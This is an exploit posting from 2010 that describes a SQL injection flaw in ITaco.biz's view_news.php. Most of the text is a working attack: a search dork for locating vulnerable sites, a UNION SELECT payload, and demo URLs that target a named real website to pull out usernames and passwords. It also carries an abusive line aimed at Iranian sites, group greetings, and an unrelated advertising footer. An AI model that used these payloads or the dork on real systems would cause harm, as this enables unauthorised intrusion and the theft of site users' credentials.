# Exploit Title: ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability # Date: 5/1/2010 # Author: Err0R # Software Link: ITaco.biz # Version: N/A # Tested on: () # CVE : () # Code : 11009 ============================================================================= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ----------------------------------------------------------------------------- ############################################################################ # (+) Title : ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability # (+) Auther: Err0R # (+) Site : sa-hacker.com/vb # (+) Email : a5q(AT)hotmail(dot)com ############################################################################ ----------------------------------------------------------------------------- # (+) dork : intext"powered by itaco group" ----------------------------------------------------------------------------- # (+) Exploit : site/path/view_news.php?id=-999+union+select+1,2,3,4,5,6,7,8,9-- and you come the Inject (+) Demo :- Username : http://ardabiliec.ir/view_news.php?id=-117+union+select+1,2,3,userid,5,6,7,8,9+from+ardabil_ardabil_iec.userlog%20-- Passoword: http://ardabiliec.ir/view_news.php?id=-117+union+select+1,2,3,password,5,6,7,8,9+from+ardabil_ardabil_iec.users-- ----------------------------------------------------------------------------- Fuck all site Iranian ------------- Good Luck ------------- # (+) Greetz To :- ===================================================+ all member in www .Sa-hacker.com/vb | ++++++++++++++++++++++++++++++++++++++++++++ | Special To :Pepsi & Dr.X3 & wlhaan & X-SHADOW | ++++++++++++++++++++++++++++++++++++++++++++ | ===================================================+ ----------------------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ============================================================================= ________________________________ Windows 7: Make your own home movies. Learn more.